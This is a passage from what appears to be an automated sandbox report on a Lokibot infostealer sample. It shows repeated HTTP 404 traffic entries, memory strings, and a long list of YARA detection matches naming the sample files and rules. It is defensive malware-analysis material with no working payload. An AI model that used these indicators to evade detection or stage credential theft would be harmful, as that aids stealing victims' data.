Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 10 Jan 2025 22:40:08 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 10 Jan 2025 22:40:09 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 10 Jan 2025 22:40:10 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 10 Jan 2025 22:40:10 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 10 Jan 2025 22:40:11 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 10 Jan 2025 22:40:12 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 10 Jan 2025 22:40:13 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 10 Jan 2025 22:40:14 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 10 Jan 2025 22:40:15 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 10 Jan 2025 22:40:16 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 10 Jan 2025 22:40:17 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 10 Jan 2025 22:40:18 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 10 Jan 2025 22:40:19 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 10 Jan 2025 22:40:19 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 10 Jan 2025 22:40:20 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 10 Jan 2025 22:40:21 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 10 Jan 2025 22:40:22 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 10 Jan 2025 22:40:23 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 10 Jan 2025 22:40:24 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 10 Jan 2025 22:40:25 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 10 Jan 2025 22:40:26 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 10 Jan 2025 22:40:27 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 10 Jan 2025 22:40:27 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 10 Jan 2025 22:40:28 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 10 Jan 2025 22:40:29 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 10 Jan 2025 22:40:30 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 10 Jan 2025 22:40:31 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 10 Jan 2025 22:40:32 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 10 Jan 2025 22:40:33 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 10 Jan 2025 22:40:34 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 10 Jan 2025 22:40:35 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 10 Jan 2025 22:40:36 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 10 Jan 2025 22:40:36 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 10 Jan 2025 22:40:37 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 10 Jan 2025 22:40:38 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 10 Jan 2025 22:40:39 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 10 Jan 2025 22:40:40 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 10 Jan 2025 22:40:41 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 10 Jan 2025 22:40:42 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 10 Jan 2025 22:40:43 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 10 Jan 2025 22:40:44 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 10 Jan 2025 22:40:44 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 10 Jan 2025 22:40:46 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 10 Jan 2025 22:40:46 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 10 Jan 2025 22:40:47 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 10 Jan 2025 22:40:48 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 10 Jan 2025 22:40:49 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 10 Jan 2025 22:40:50 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 10 Jan 2025 22:40:51 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 10 Jan 2025 22:40:52 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 10 Jan 2025 22:40:53 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 10 Jan 2025 22:40:54 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 10 Jan 2025 22:40:55 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 10 Jan 2025 22:40:55 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 10 Jan 2025 22:40:56 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 10 Jan 2025 22:40:57 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 10 Jan 2025 22:40:58 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 10 Jan 2025 22:40:59 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 10 Jan 2025 22:41:00 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 10 Jan 2025 22:41:01 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 10 Jan 2025 22:41:02 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Source: oAUBqI6vQ7.exe, 00000000.00000002.1428115991.000000000326F000.00000004.00000800.00020000.00000000.sdmp, Xzacmv.exe, 0000000A.00000002.1477049418.0000000002A4F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Xzacmv.exe, Xzacmv.exe, 0000000F.00000002.1454881025.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://www.ibsensoftware.com/

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.oAUBqI6vQ7.exe.42e81f0.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.oAUBqI6vQ7.exe.42e81f0.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.oAUBqI6vQ7.exe.42e81f0.3.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.oAUBqI6vQ7.exe.42e81f0.3.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 10.2.Xzacmv.exe.3aab850.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 10.2.Xzacmv.exe.3aab850.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 10.2.Xzacmv.exe.3aab850.3.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 10.2.Xzacmv.exe.3aab850.3.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.oAUBqI6vQ7.exe.42ce1d0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.oAUBqI6vQ7.exe.42ce1d0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.oAUBqI6vQ7.exe.42ce1d0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.oAUBqI6vQ7.exe.42ce1d0.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.oAUBqI6vQ7.exe.42ce1d0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 10.2.Xzacmv.exe.3aab850.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 10.2.Xzacmv.exe.3aab850.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 10.2.Xzacmv.exe.3aab850.3.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 10.2.Xzacmv.exe.3aab850.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 10.2.Xzacmv.exe.3aab850.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 10.2.Xzacmv.exe.3ac5870.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 10.2.Xzacmv.exe.3ac5870.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 10.2.Xzacmv.exe.3ac5870.1.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 10.2.Xzacmv.exe.3ac5870.1.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 15.2.Xzacmv.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 15.2.Xzacmv.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 15.2.Xzacmv.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 15.2.Xzacmv.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 15.2.Xzacmv.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.oAUBqI6vQ7.exe.42ce1d0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.oAUBqI6vQ7.exe.42ce1d0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.oAUBqI6vQ7.exe.42ce1d0.1.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.oAUBqI6vQ7.exe.42ce1d0.1.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.oAUBqI6vQ7.exe.42e81f0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.oAUBqI6vQ7.exe.42e81f0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.oAUBqI6vQ7.exe.42e81f0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.oAUBqI6vQ7.exe.42e81f0.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.oAUBqI6vQ7.exe.42e81f0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 15.2.Xzacmv.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 15.2.Xzacmv.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 15.2.Xzacmv.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 15.2.Xzacmv.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 15.2.Xzacmv.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 10.2.Xzacmv.exe.3ac5870.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 10.2.Xzacmv.exe.3ac5870.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 10.2.Xzacmv.exe.3ac5870.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 10.2.Xzacmv.exe.3ac5870.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 10.2.Xzacmv.exe.3ac5870.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0000000A.00000002.1477049418.0000000002AA7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0000000A.00000002.1477049418.0000000002AA7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0000000A.00000002.1477049418.0000000002AA7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.1479318717.0000000003AAB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0000000A.00000002.1479318717.0000000003AAB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0000000A.00000002.1479318717.0000000003AAB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1429235724.00000000042CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.1429235724.00000000042CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.1429235724.00000000042CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.1454881025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
